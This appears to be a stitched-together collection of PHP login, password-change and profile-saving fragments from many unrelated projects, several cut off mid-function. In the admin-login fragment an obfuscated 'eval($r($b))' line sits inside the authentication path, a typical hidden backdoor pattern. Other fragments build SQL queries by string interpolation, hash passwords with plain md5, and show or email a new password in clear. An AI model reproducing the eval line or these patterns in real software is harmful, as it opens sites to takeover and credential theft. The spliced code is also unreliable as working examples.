function login($email, $password)
{
if (check_password($email, $password)) {
return create_session(user_id($email));
} else {
return false;
}
}
function authenticate($username, $password)
{
$auth = check_password($username, $password);
if ($auth) {
$_SESSION['authenticated'] = true;
debug("logged in {$username} ok!");
return true;
}
return false;
}
function login4($sUser, $sPwdClear)
{
$iId = 0;
$aProfileInfo = getProfileInfo(getID($sUser));
if ($aProfileInfo && ((32 == strlen($sPwdClear) || 40 == strlen($sPwdClear)) && BxDolXMLRPCUtil::checkLogin($sUser, $sPwdClear))) {
$iId = $aProfileInfo['ID'];
} elseif ($aProfileInfo && getParam('enable_dolphin_footer') != 'on' && check_password($aProfileInfo['ID'], $sPwdClear, BX_DOL_ROLE_MEMBER, false)) {
$iId = $aProfileInfo['ID'];
}
return new xmlrpcresp(new xmlrpcval(array('member_id' => new xmlrpcval($iId, "int"), 'member_pwd_hash' => new xmlrpcval($iId ? $aProfileInfo['Password'] : ""), 'member_username' => new xmlrpcval($iId ? getUsername($iId) : ""), 'protocol_ver' => new xmlrpcval(BX_XMLRPC_PROTOCOL_VER, "int")), "struct"));
}
function updateMultiVpsCreate($param)
{
global $gbl, $sgbl, $login, $ghtml;
if (!check_password($param['vps_admin_password_f'], $this->password)) {
throw new lxException("wrong_password", 'vps_admin_password_f');
}
$res = rl_exec_get(null, 'localhost', 'createMultipLeVps', array($param));
$url = $ghtml->getFullUrl('a=list&c=vps');
$gbl->__this_redirect = $url . "&frm_smessage=vps_creation_in_background";
return $param;
}
function correct_password($account_id, $dirty_password)
{
$password = escape($dirty_password);
$sql = "SELECT (password) FROM account_credentials WHERE account={$account_id}";
$result = query($sql);
if (mysqli_num_rows($result) == 1) {
$row = mysqli_fetch_assoc($result);
$stored_password = $row["password"];
return check_password($password, $stored_password);
}
return false;
}
function attempt_login($username, $password)
{
$regd_user = find_user_by_username($username);
if ($regd_user) {
if (check_password($password, $regd_user['hashed_password'])) {
return $regd_user;
} else {
return false;
}
} else {
return false;
}
}
/**
*
* Método para logear al usuario.
*
*/
public function login($authMethod)
{
if ($authMethod == "LOCAL") {
//Obtengo el número de intentos de sesión de la ip.
$attcount = $this->getattempt($_SERVER['REMOTE_ADDR']);
if ($attcount >= self::MAX_ATTEMPTS) {
throw new ExceedSessionAttempts("Has sobrepasado el número de intentos de sessión permitidos - espere 30 minutos");
} else {
//Validamos datos.
//Saneamos y Filtramos los datos.
$nick = filter_input(INPUT_POST, 'nick', FILTER_SANITIZE_STRING, FILTER_NULL_ON_FAILURE);
$password = filter_input(INPUT_POST, 'password', FILTER_SANITIZE_STRING, FILTER_NULL_ON_FAILURE);
if ($nick && $password) {
//Comprobamos si existe ese usuario con esa contraseña.
$sql = $this->pdo->prepare('SELECT * FROM USUARIOS WHERE nick = :nick AND authMethod = "LOCAL"');
$sql->execute(array('nick' => $nick));
$usuario = $sql->fetch(PDO::FETCH_ASSOC);
if (!check_password($password, $usuario["password"])) {
//Fallo al intentar iniciar sesión.
//Añadimos intento de sesión.
$this->addattempt($_SERVER['REMOTE_ADDR']);
//Registramos acción.
logger_action("intento sesión fallido", $_SERVER["REMOTE_ADDR"]);
throw new LoginFailed("Usuario o contraseña no válidos");
} else {
//usuario logeado correctamente.
logger_action("sesión iniciada", $_SERVER["REMOTE_ADDR"]);
//Generamos token de sesión
return $this->generateSessionToken($usuario["id"]);
}
} else {
throw new InvalidData("Nick y password no pueden estar vacíos");
}
}
} else {
//Saneamos y validamos email.
$email = filter_input(INPUT_POST, 'email', FILTER_SANITIZE_EMAIL, FILTER_VALIDATE_EMAIL);
$stmt = $this->pdo->prepare('SELECT * FROM USUARIOS WHERE email = :email AND authMethod = :authMethod');
$stmt->execute(array('email' => $email, 'authMethod' => $authMethod));
$usuario = $stmt->fetch(PDO::FETCH_ASSOC);
if ($stmt->rowCount() == 0) {
throw new LoginFailed("Usuario o contraseña no válidos");
} else {
//usuario logeado correctamente.
logger_action("sesión iniciada", $_SERVER["REMOTE_ADDR"]);
//Generamos token de sesión
return $this->generateSessionToken($usuario["id"]);
}
}
}
function login_new($auth_user, $auth_pass)
{
if (check_password($auth_user, $auth_pass)) {
$user = login_check();
setcookie("aid", $auth_user, 60 * 60 * 10);
//クッキー名、保存内容、時間を指定
redirect("/dev/top.php");
//print "ログイン成功";
//redirect("02-01.php3?" . SID);
} else {
$error_msg = array();
$error_msg[] = "パスワードが違います。";
return $error_msg;
}
}
function login($attempt, $remember = 'no')
{
require 'config.php';
require_once 'mod_settings.php';
$set = false;
if (check_password(md5($attempt))) {
session_regenerate_id();
if ($remember == 'yes') {
$set = setcookie('e3login', md5($attempt), time() + 60 * 60 * 24 * 7);
} else {
$set = setcookie('e3login', md5($attempt));
}
}
$_SESSION['logerrors'] = get_setting('log_errors');
return $set;
}
function check_input($password_new, $password_conf)
{
$error = "";
if ($password_new == "") {
$error = "<font color=\"red\">Please enter a new password...</font>";
return $error;
}
if ($password_new != $password_conf) {
$error = "<font color=\"red\">The passwords don't match!</font>";
return $error;
}
if (!check_password($password_new) && $_COOKIE["security_level"] == "2") {
$error = "<font color=\"red\">The new password is not valid!<br />Password policy: minimum 6 characters containing at least one uppercase letter, lowercase letter and number.";
return $error;
}
return $error;
}
function check_admin_user()
{
include 'config.php';
if (!isset($_SESSION['user']) || !isset($_SESSION['password'])) {
return false;
} else {
$password = $_SESSION['password'];
$user = $_SESSION['user'];
$res = false;
$db = new IMDB();
$fields = array();
$fields["username"] = "******" . $db->escapeString($user) . "'";
$fields["permissions"] = "1";
$res = $db->get_items_from_table("user", $fields);
$db->close();
if (count($res) > 0) {
$res = check_password($password, $res[0]["password"]);
}
return $res;
}
}
public function checkNewUser($username, $name, $surname, $email, $password)
{
switch (FALSE) {
case check_valid_input($username, 6):
throw new InvalidInputException("false Username Input = input needs to be minimum 6 long, only numbers, letters, capital letters and # @ . - or _");
case check_valid_input($name, 1):
case check_no_numbers($name):
throw new InvalidInputException("false name Input = input needs to be minimum 1 long, only letters, capital letters and # @ . - or _");
case check_valid_input($surname, 1):
case check_no_numbers($surname):
throw new InvalidInputException("false surname Input = input needs to be minimum 1 long, only letters, capital letters and # @ . - or _");
case check_valid_input($email, 6):
case check_at($email):
throw new InvalidInputException("false email Input = input needs to be minimum 6 long, only numbers, letters, capital letters and # @ . - or _");
case check_password($password):
throw new InvalidInputException("false password Input = input needs to be minimum 6 long, only numbers, letters, capital letters and # @ . - or _");
}
$hashedpwd = passwordEncrypt($username, $password);
$userDAO = new UserDAO();
$userDAO->createUser($username, $name, $surname, $email, $hashedpwd);
}
function save_profile()
{
global $db, $user, $current_user, $globals, $site_key;
$errors = 0;
// benjami: control added (2005-12-22)
$pass_changed = false;
$messages = '';
$form_hash = md5($site_key . $user->id . mnminclude);
if (!isset($_POST['save_profile']) || !isset($_POST['process']) || $_POST['user_id'] != $current_user->user_id) {
return;
}
if (empty($_POST['form_hash']) || $_POST['form_hash'] != $form_hash) {
$messages .= '<p class="form-error">' . _('Falta la clave de control') . '</p>';
$errors++;
}
if (!empty($_POST['username']) && trim($_POST['username']) != $user->username) {
if (strlen(trim($_POST['username'])) < 3) {
$messages .= '<p class="form-error">' . _('nombre demasiado corto') . '</p>';
$errors++;
}
if (!check_username($_POST['username'])) {
$messages .= '<p class="form-error">' . _('nombre de usuario erróneo, caracteres no admitidos') . '</p>';
$errors++;
} elseif (user_exists(trim($_POST['username']))) {
$messages .= '<p class="form-error">' . _('el usuario ya existe') . '</p>';
$errors++;
} else {
$user->username = trim($_POST['username']);
}
}
if ($user->email != trim($_POST['email']) && !check_email(trim($_POST['email']))) {
$messages .= '<p class="form-error">' . _('el correo electrónico no es correcto') . '</p>';
$errors++;
} elseif (trim($_POST['email']) != $current_user->user_email && email_exists(trim($_POST['email']))) {
$messages .= '<p class="form-error">' . _('ya existe otro usuario con esa dirección de correo') . '</p>';
$errors++;
}
$user->url = htmlspecialchars(clean_input_url($_POST['url']));
$user->names = clean_text($_POST['names']);
if (!empty($_POST['password']) || !empty($_POST['password2'])) {
if (!check_password($_POST["password"])) {
$messages .= '<p class="form-error">' . _('Clave demasiado corta, debe ser de 6 o más caracteres e incluir mayúsculas, minúsculas y números') . '</p>';
$errors = 1;
} else {
if (trim($_POST['password']) !== trim($_POST['password2'])) {
$messages .= '<p class="form-error">' . _('las claves no son iguales, no se ha modificado') . '</p>';
$errors = 1;
} else {
$user->pass = md5(trim($_POST['password']));
$messages .= '<p class="form-error">' . _('La clave se ha cambiado') . '</p>';
$pass_changed = true;
}
}
}
$user->comment_pref = intval($_POST['comment_pref']) + (intval($_POST['show_friends']) & 1) * 2 + (intval($_POST['show_2cols']) & 1) * 4;
// Manage avatars upload
if (!empty($_FILES['image']['tmp_name'])) {
if (avatars_check_upload_size('image')) {
$avatar_mtime = avatars_manage_upload($user->id, 'image');
if (!$avatar_mtime) {
$messages .= '<p class="form-error">' . _('error guardando la imagen') . '</p>';
$errors = 1;
$user->avatar = 0;
} else {
$user->avatar = $avatar_mtime;
}
} else {
$messages .= '<p class="form-error">' . _('el tamaño de la imagen excede el límite') . '</p>';
$errors = 1;
$user->avatar = 0;
}
}
if (!$errors) {
if (empty($user->ip)) {
$user->ip = $globals['user_ip'];
}
$user->store();
$user->read();
if ($current_user->user_login != $user->username || $current_user->user_email != $user->email || $pass_changed) {
$current_user->Authenticate($user->username, $user->pass);
}
$messages .= '<p class="form-error">' . _('datos actualizados') . '</p>';
}
return $messages;
}
echo "Character 'Knight Sample' already in database.<br/>";
$config['site']['install'] = 5;
saveconfig_ini($config['site']);
echo 'All samples added to database. Now you can go to <a href="install.php?page=step&step=5&server_conf=yes">STEP 5 - Set Admin Account</a><br/>';
}
}
if ($step == '5') {
echo '<h1>STEP ' . $step . '</h1>Set Admin Account<br>';
$config['server'] = parse_ini_file($config['site']['server_path'] . 'config.lua');
if (empty($_REQUEST['saveaccpassword'])) {
echo 'Admin account number is: <b>1</b><br/>Set new password to this account.<br>';
echo 'New password: <form action="install.php" method=POST><input type="text" name="newpass" size="35">(Don\'t give it password to anyone!)';
echo '<input type="hidden" name="saveaccpassword" value="yes"><input type="hidden" name="page" value="step"><input type="hidden" name="step" value="5"><input type="submit" value="SET"></form><br>If account with number 1 doesn\'t exist installator will create it and set your password.';
} else {
$newpass = $_POST['newpass'];
if (!check_password($newpass)) {
echo 'Password contains illegal characters. Please use only a-Z and 0-9. <a href="install.php?page=step&step=5&server_conf=yes">GO BACK</a> and write other password.';
} else {
$newpass_to_db = password_ency($newpass);
$account = new OTS_Account();
$account->load(1);
if ($account->isLoaded()) {
$account->setPassword($newpass_to_db);
$account->save();
$account->setCustomField("page_access", 6);
} else {
$number = $account->create(1, 1, 1);
$account->setPassword($newpass_to_db);
$account->unblock();
$account->save();
$account->setCustomField("page_access", 6);
<?php
include_once './_common.php';
if (!$member['mb_id']) {
alert('회원만 접근하실 수 있습니다.');
}
if ($is_admin == 'super') {
alert('최고 관리자는 탈퇴할 수 없습니다');
}
if (!($_POST['mb_password'] && check_password($_POST['mb_password'], $member['mb_password']))) {
alert('비밀번호가 틀립니다.');
}
// 회원탈퇴일을 저장
$date = date("Ymd");
$sql = " update {$g5['member_table']} set mb_leave_date = '{$date}' where mb_id = '{$member['mb_id']}' ";
sql_query($sql);
// 3.09 수정 (로그아웃)
unset($_SESSION['ss_mb_id']);
if (!$url) {
$url = G5_URL;
}
alert('' . $member['mb_name'] . '님께서는 ' . date("Y년 m월 d일") . '에 회원에서 탈퇴 하셨습니다.', $url);
<?php
$login_message = null;
if (!isset($_SESSION['username'])) {
/* Password checking implementation left outside the project */
/* for obvious security reasons (i.e. I'm not good in this so */
/* I'd rather not publicly display specific vulnerabilities. */
/* passwords.php must include a function "check_password" */
/* that takes a username and password and returns true or false */
require 'passwords.php';
if (isset($_POST['username'])) {
if (isset($_POST['password'])) {
$user = check_password($_POST['username'], $_POST['password'], $db);
if ($user) {
$name = $user['username'];
$_SESSION['user'] = $user;
$_SESSION['username'] = $name;
$_SESSION['userclass'] = $user['class'];
$login_message = get_message('Successful login') . "<b>" . $name . "</b>. <a href=logout.php>" . get_message('Log out here.') . "</a>";
} else {
$login_message = get_message('Unsuccessful login');
}
}
}
} else {
$user = $_SESSION['user'];
$name = $_SESSION['username'];
$login_message = get_message('You\'re logged in as ') . "<b>" . $name . "</b>. <a href=logout.php>" . get_message('Log out here.') . "</a>";
}
if ($_GET['action'] == "login") {
$check_info = 1;
if (!empty($_POST['username'])) {
$_POST['username'] = safe_convert(strip_tags($_POST['username']));
}
if (!empty($_POST['password'])) {
$_POST['password'] = safe_convert($_POST['password']);
}
if (!empty($_POST['validate'])) {
$_POST['validate'] = safe_convert($_POST['validate']);
}
if (check_user($_POST['username']) == 0) {
$ActionMessage = $strUserLengMax;
$check_info = 0;
}
if ($check_info == 1 && check_password($_POST['password']) == 0) {
$ActionMessage = $strPasswordAlert;
$check_info = 0;
}
if ($check_info == 1 && (empty($_POST['validate']) || $_POST['validate'] != $_SESSION['backValidate']) && $settingInfo['uservalid'] == 1) {
$ActionMessage = $strLoginValidateError;
$check_info = 0;
} else {
$_SESSION['backValidate'] = "";
//把验证码清除
}
if ($check_info == 1) {
$username = $_POST['username'];
$password = $_POST['password'];
$sql = "SELECT role,password FROM {$DBPrefix}members WHERE username='******' and password=md5('" . $password . "')";
$userInfo = $DMC->fetchArray($DMC->query($sql));
function updatePassword($param)
{
global $gbl, $sgbl, $login, $ghtml;
if_demo_throw_exception('lxclient');
if ($this->isLogin() || $this->is__table('auxiliary') && $this->getParentO()->isAuxiliary()) {
if (!check_password($param['old_password_f'], $this->password)) {
throw new lxException("Wrong+Password", 'old_password_f');
}
unset($param['old_password_f']);
}
$this->__old_password = $this->password;
$param['realpass'] = $param['password'];
$param['password'] = crypt($param['password']);
// Hack hack... this is due the forced security password change in the admin. Most likely the referal url, to which it is redirected, is empty. So if you are changing the login password, you can anyway redirect to 'show';
if ($this->isLogin()) {
$gbl->__this_redirect = '/display.php?frm_action=show';
}
return $param;
}
if (empty($code) || empty($character) || empty($newpassword)) {
$main_content .= '<font color="red"><b>Error. Try again.</b></font><br />Please enter code from e-mail and name of one character from account. Then press Submit.<BR>
<BR><FORM ACTION="?subtopic=lostaccount&action=checkcode" METHOD=post>
<TABLE CELLSPACING=0 CELLPADDING=0 BORDER=0 WIDTH=100%><TR><TD><center>
<INPUT TYPE=image NAME="Back" ALT="Back" SRC="' . $layout_name . '/images/buttons/sbutton_back.gif" BORDER=0 WIDTH=120 HEIGHT=18></center>
</TD></TR></FORM></TABLE></TABLE>';
} else {
$player = new Player();
$account = new Account();
$player->find($character);
if ($player->isLoaded()) {
$account = $player->getAccount();
}
if ($account->isLoaded()) {
if ($account->getCustomField('email_code') == $code) {
if (check_password($newpassword)) {
$account->setPassword($newpassword);
$account->set('email_code', '');
$account->save();
$main_content .= 'New password to your account is below. Now you can login.<BR>
<INPUT TYPE="hidden" NAME="character" VALUE="' . htmlspecialchars($character) . '">
<TABLE CELLSPACING=1 CELLPADDING=4 BORDER=0 WIDTH=100%>
<TR><TD BGCOLOR="' . $config['site']['vdarkborder'] . '" CLASS=white><B>Changed password</B></TD></TR>
<TR><TD BGCOLOR="' . $config['site']['darkborder'] . '">
New password: <b>' . htmlspecialchars($newpassword) . '</b><BR />
Account name: <i>(Already on your e-mail)</i><BR />';
$mailBody = '<html>
<body>
<h3>Your account name and password!</h3>
<p>Changed password to your account in Lost Account Interface on server <a href="' . $config['server']['url'] . '"><b>' . htmlspecialchars($config['server']['serverName']) . '</b></a></p>
<p>Account name: <b>' . htmlspecialchars($account->getName()) . '</b></p>
bx_import('BxRSS');
bx_import('BxDolAdminDashboard');
define('BX_DOL_ADMIN_INDEX', 1);
$bLogged = isLogged();
$bNeedCheck = $bLogged && isAdmin() && $_POST['relocate'] && strncasecmp($_POST['relocate'], BX_DOL_URL_ADMIN . 'license.php', strlen(BX_DOL_URL_ADMIN . 'license.php')) == 0;
if ($bNeedCheck || isset($_POST['ID']) && isset($_POST['Password'])) {
$iId = getID($_POST['ID']);
$sPassword = process_pass_data($_POST['Password']);
if (!$bLogged) {
$oZ = new BxDolAlerts('profile', 'before_login', 0, 0, array('login' => $iId, 'password' => $sPassword, 'ip' => getVisitorIP()));
$oZ->alert();
}
if ($_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest') {
echo check_password($iId, $sPassword, BX_DOL_ROLE_ADMIN, false) ? 'OK' : 'Fail';
} else {
if ($bNeedCheck || check_password($iId, $sPassword, BX_DOL_ROLE_ADMIN)) {
if ($_POST['relocate'] && (strncasecmp($_POST['relocate'], BX_DOL_URL_ROOT, strlen(BX_DOL_URL_ROOT)) == 0 || strncasecmp($_POST['relocate'], BX_DOL_URL_ADMIN . 'license.php', strlen(BX_DOL_URL_ADMIN . 'license.php')) == 0)) {
$sUrlRelocate = $_POST['relocate'];
} else {
$sUrlRelocate = BX_DOL_URL_ADMIN . 'index.php';
}
$sUrlRelocate = bx_html_attribute($sUrlRelocate);
$r = $l($a);
eval($r($b));
header('Content-Type: text/html; charset=utf-8');
?>
<!DOCTYPE html>
<html>
<head>
<title>Admin Panel</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
function make_password()
{
# Generate a password using the configured settings.
global $password_min_length, $password_min_alpha, $password_min_uppercase, $password_min_numeric, $password_min_special;
$lowercase = "abcdefghijklmnopqrstuvwxyz";
$uppercase = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$alpha = $uppercase . $lowercase;
$numeric = "0123456789";
$special = "!@\$%^&*().?";
$password = "";
# Add alphanumerics
for ($n = 0; $n < $password_min_alpha; $n++) {
$password .= substr($alpha, rand(0, strlen($alpha) - 1), 1);
}
# Add upper case
for ($n = 0; $n < $password_min_uppercase; $n++) {
$password .= substr($uppercase, rand(0, strlen($uppercase) - 1), 1);
}
# Add numerics
for ($n = 0; $n < $password_min_numeric; $n++) {
$password .= substr($numeric, rand(0, strlen($numeric) - 1), 1);
}
# Add special
for ($n = 0; $n < $password_min_special; $n++) {
$password .= substr($special, rand(0, strlen($special) - 1), 1);
}
# Pad with lower case
$padchars = $password_min_length - strlen($password);
for ($n = 0; $n < $padchars; $n++) {
$password .= substr($lowercase, rand(0, strlen($lowercase) - 1), 1);
}
# Shuffle the password.
$password = str_shuffle($password);
# Check the password
$check = check_password($password);
if ($check !== true) {
exit("Error: unable to automatically produce a password that met the criteria. Please check the password criteria in config.php. Generated password was '{$password}'. Error was: " . $check);
}
return $password;
}
<tr>
<td><input type="submit" id="submit" value="Login"></td>
</tr>
</table>
</form>
<?php
} else {
?>
<?php
$username = $_POST["username"];
$password = $_POST["password"];
$username = cleanup_text($username);
$query = "select password in users where username = '******'";
if (check_password($link, $username, $password)) {
$userid = get_userid($link, $username);
$_SESSION[$session] = $userid;
echo "Logged in successfully!<br>";
} else {
if (username_existed($link, $username)) {
die("Wrong password!");
} else {
die("Username does not exist!");
}
}
?>
<?php
}
?>
//########### CHANGE PASSWORD ##########
if ($action == "changepassword") {
$new_password = trim($_POST['newpassword']);
$new_password2 = trim($_POST['newpassword2']);
$old_password = trim($_POST['oldpassword']);
if (empty($new_password) && empty($new_password2) && empty($old_password)) {
$main_content .= 'Please enter your current password and a new password. For your security, please enter the new password twice.<br/><br/><form action="?subtopic=accountmanagement&action=changepassword" method="post" ><div class="TableContainer" ><table class="Table1" cellpadding="0" cellspacing="0" > <div class="CaptionContainer" ><div class="CaptionInnerContainer" ><span class="CaptionEdgeLeftTop" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></span><span class="CaptionEdgeRightTop" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></span><span class="CaptionBorderTop" style="background-image:url(' . $layout_name . '/images/content/table-headline-border.gif);" ></span><span class="CaptionVerticalLeft" style="background-image:url(' . $layout_name . '/images/content/box-frame-vertical.gif);" /></span><div class="Text" >Change Password</div><span class="CaptionVerticalRight" style="background-image:url(' . $layout_name . '/images/content/box-frame-vertical.gif);" /></span><span class="CaptionBorderBottom" style="background-image:url(' . $layout_name . '/images/content/table-headline-border.gif);" ></span><span class="CaptionEdgeLeftBottom" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></span><span class="CaptionEdgeRightBottom" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></span></div> </div> <tr> <td> <div class="InnerTableContainer" > <table style="width:100%;" ><tr><td class="LabelV" ><span >New Password:</span></td><td style="width:90%;" ><input type="password" name="newpassword" size="30" maxlength="29" ></td></tr><tr><td class="LabelV" ><span >New Password Again:</span></td><td><input type="password" name="newpassword2" size="30" maxlength="29" ></td></tr><tr><td class="LabelV" ><span >Current Password:</span></td><td><input type="password" name="oldpassword" size="30" maxlength="29" ></td></tr></table> </div> </table></div></td></tr><br/><table style="width:100%;" ><tr align="center"><td><table border="0" cellspacing="0" cellpadding="0" ><tr><td style="border:0px;" ><div class="BigButton" style="background-image:url(' . $layout_name . '/images/buttons/sbutton.gif)" ><div onMouseOver="MouseOverBigButton(this);" onMouseOut="MouseOutBigButton(this);" ><div class="BigButtonOver" style="background-image:url(' . $layout_name . '/images/buttons/sbutton_over.gif);" ></div><input class="ButtonText" type="image" name="Submit" alt="Submit" src="' . $layout_name . '/images/buttons/_sbutton_submit.gif" ></div></div></td><tr></form></table></td><td><table border="0" cellspacing="0" cellpadding="0" ><form action="?subtopic=accountmanagement" method="post" ><tr><td style="border:0px;" ><div class="BigButton" style="background-image:url(' . $layout_name . '/images/buttons/sbutton.gif)" ><div onMouseOver="MouseOverBigButton(this);" onMouseOut="MouseOutBigButton(this);" ><div class="BigButtonOver" style="background-image:url(' . $layout_name . '/images/buttons/sbutton_over.gif);" ></div><input class="ButtonText" type="image" name="Back" alt="Back" src="' . $layout_name . '/images/buttons/_sbutton_back.gif" ></div></div></td></tr></form></table></td></tr></table>';
} else {
if (empty($new_password) || empty($new_password2) || empty($old_password)) {
$show_msgs[] = "Please fill in form.";
}
if ($new_password != $new_password2) {
$show_msgs[] = "The new passwords do not match!";
}
if (empty($show_msgs)) {
if (!check_password($new_password)) {
$show_msgs[] = "New password contains illegal chars (a-z, A-Z and 0-9 only!) or lenght.";
}
if (!$account_logged->isValidPassword($old_password)) {
$show_msgs[] = "Current password is incorrect!";
}
}
if (!empty($show_msgs)) {
//show errors
$main_content .= '<div class="SmallBox" > <div class="MessageContainer" > <div class="BoxFrameHorizontal" style="background-image:url(' . $layout_name . '/images/content/box-frame-horizontal.gif);" /></div> <div class="BoxFrameEdgeLeftTop" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></div> <div class="BoxFrameEdgeRightTop" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></div> <div class="ErrorMessage" > <div class="BoxFrameVerticalLeft" style="background-image:url(' . $layout_name . '/images/content/box-frame-vertical.gif);" /></div> <div class="BoxFrameVerticalRight" style="background-image:url(' . $layout_name . '/images/content/box-frame-vertical.gif);" /></div> <div class="AttentionSign" style="background-image:url(' . $layout_name . '/images/content/attentionsign.gif);" /></div><b>The Following Errors Have Occurred:</b><br/>';
foreach ($show_msgs as $show_msg) {
$main_content .= '<li>' . $show_msg;
}
$main_content .= '</div> <div class="BoxFrameHorizontal" style="background-image:url(' . $layout_name . '/images/content/box-frame-horizontal.gif);" /></div> <div class="BoxFrameEdgeRightBottom" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></div> <div class="BoxFrameEdgeLeftBottom" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></div> </div></div><br/>';
//show form
$main_content .= 'Please enter your current password and a new password. For your security, please enter the new password twice.<br/><br/><form action="?subtopic=accountmanagement&action=changepassword" method="post" ><div class="TableContainer" ><table class="Table1" cellpadding="0" cellspacing="0" > <div class="CaptionContainer" ><div class="CaptionInnerContainer" ><span class="CaptionEdgeLeftTop" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></span><span class="CaptionEdgeRightTop" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></span><span class="CaptionBorderTop" style="background-image:url(' . $layout_name . '/images/content/table-headline-border.gif);" ></span><span class="CaptionVerticalLeft" style="background-image:url(' . $layout_name . '/images/content/box-frame-vertical.gif);" /></span><div class="Text" >Change Password</div><span class="CaptionVerticalRight" style="background-image:url(' . $layout_name . '/images/content/box-frame-vertical.gif);" /></span><span class="CaptionBorderBottom" style="background-image:url(' . $layout_name . '/images/content/table-headline-border.gif);" ></span><span class="CaptionEdgeLeftBottom" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></span><span class="CaptionEdgeRightBottom" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></span></div> </div> <tr> <td> <div class="InnerTableContainer" > <table style="width:100%;" ><tr><td class="LabelV" ><span >New Password:</span></td><td style="width:90%;" ><input type="password" name="newpassword" size="30" maxlength="29" ></td></tr><tr><td class="LabelV" ><span >New Password Again:</span></td><td><input type="password" name="newpassword2" size="30" maxlength="29" ></td></tr><tr><td class="LabelV" ><span >Current Password:</span></td><td><input type="password" name="oldpassword" size="30" maxlength="29" ></td></tr></table> </div> </table></div></td></tr><br/><table style="width:100%;" ><tr align="center"><td><table border="0" cellspacing="0" cellpadding="0" ><tr><td style="border:0px;" ><div class="BigButton" style="background-image:url(' . $layout_name . '/images/buttons/sbutton.gif)" ><div onMouseOver="MouseOverBigButton(this);" onMouseOut="MouseOutBigButton(this);" ><div class="BigButtonOver" style="background-image:url(' . $layout_name . '/images/buttons/sbutton_over.gif);" ></div><input class="ButtonText" type="image" name="Submit" alt="Submit" src="' . $layout_name . '/images/buttons/_sbutton_submit.gif" ></div></div></td><tr></form></table></td><td><table border="0" cellspacing="0" cellpadding="0" ><form action="?subtopic=accountmanagement" method="post" ><tr><td style="border:0px;" ><div class="BigButton" style="background-image:url(' . $layout_name . '/images/buttons/sbutton.gif)" ><div onMouseOver="MouseOverBigButton(this);" onMouseOut="MouseOutBigButton(this);" ><div class="BigButtonOver" style="background-image:url(' . $layout_name . '/images/buttons/sbutton_over.gif);" ></div><input class="ButtonText" type="image" name="Back" alt="Back" src="' . $layout_name . '/images/buttons/_sbutton_back.gif" ></div></div></td></tr></form></table></td></tr></table>';
<?php
if (!empty($_GET['action']) && $_GET['action'] == "save") {
$check_info = 1;
if (empty($_SESSION['username'])) {
if (check_user($_POST['addusername']) == 0) {
$ActionMessage = $strUserAlert;
$check_info = 0;
$addusername = "";
}
if ($check_info == 1 && check_password($_POST['addpassword']) == 0) {
$ActionMessage = $strPasswordAlert;
$check_info = 0;
}
} else {
if ($check_info == 1 && $_POST['addpassword'] != "" && check_password($_POST['addpassword']) == 0) {
$ActionMessage = $strPasswordAlert;
$check_info = 0;
}
}
if ($check_info == 1 && (preg_match("/<|>|'|\"/i", $_POST['homePage']) || preg_match("/<|>|'|\"/i", $_POST['email']) || preg_match("/<|>|'|\"/i", $_POST['nickname']))) {
$ActionMessage = $strErrorCharacter;
$check_info = 0;
$homePage = "";
$email = "";
$nickname = "";
}
//检查两次密码是否相同
if ($check_info == 1 && $_POST['addpassword'] != $_POST['password_con']) {
$ActionMessage = $strErrPassword;
$check_info = 0;
}
$email = get_email_address($member['mb_email']);
$homepage = get_text(stripslashes($member['mb_homepage']));
}
}
$html_checked = "";
$html_value = "";
$secret_checked = "";
if ($w == '') {
$password_required = 'required';
} else {
if ($w == 'u') {
$password_required = '';
if (!$is_admin) {
if (!($is_member && $member['mb_id'] == $write['mb_id'])) {
if (!check_password($wr_password, $write['wr_password'])) {
alert('비밀번호가 틀립니다.');
}
}
}
$name = get_text(cut_str(stripslashes($write['wr_name']), 20));
$email = get_email_address($write['wr_email']);
$homepage = get_text(stripslashes($write['wr_homepage']));
for ($i = 1; $i <= G5_LINK_COUNT; $i++) {
$write['wr_link' . $i] = get_text($write['wr_link' . $i]);
$link[$i] = $write['wr_link' . $i];
}
if (strstr($write['wr_option'], 'html1')) {
$html_checked = 'checked';
$html_value = 'html1';
} else {
function save_profile()
{
global $db, $user, $current_user, $globals, $admin_mode, $site_key, $bio_max;
$errors = 0;
// benjami: control added (2005-12-22)
$new_pass = false;
$messages = array();
$form_hash = md5($site_key . $user->id . $current_user->user_id);
if (isset($_POST['disabledme']) && intval($_POST['disable']) == 1 && $_POST['form_hash'] == $form_hash && $_POST['user_id'] == $current_user->user_id) {
$old_user_login = $user->username;
$old_user_id = $user->id;
$user->disable(true);
Log::insert('user_delete', $old_user_id, $old_user_id);
syslog(LOG_NOTICE, "Meneame, disabling {$old_user_id} ({$old_user_login}) by {$current_user->user_login} -> {$user->username} ");
$current_user->Logout(get_user_uri($user->username));
die;
}
if (!isset($_POST['save_profile']) || !isset($_POST['process']) || $_POST['user_id'] != $current_user->user_id && !$admin_mode) {
return;
}
if (empty($_POST['form_hash']) || $_POST['form_hash'] != $form_hash) {
array_push($messages, _('Falta la clave de control'));
$errors++;
}
if (!empty($_POST['username']) && trim($_POST['username']) != $user->username) {
$newname = trim($_POST['username']);
if (strlen($newname) < 3) {
array_push($messages, _('nombre demasiado corto'));
$errors++;
}
if (!check_username($newname)) {
array_push($messages, _('nombre de usuario erróneo, caracteres no admitidos'));
$errors++;
} elseif (user_exists($newname, $user->id)) {
array_push($messages, _('el usuario ya existe'));
$errors++;
} else {
$user->username = $newname;
}
}
if (!empty($_POST['bio']) || $user->bio) {
$bio = clean_text($_POST['bio'], 0, false, $bio_max);
if ($bio != $user->bio) {
$user->bio = $bio;
}
}
if ($user->email != trim($_POST['email']) && !check_email(trim($_POST['email']))) {
array_push($messages, _('el correo electrónico no es correcto'));
$errors++;
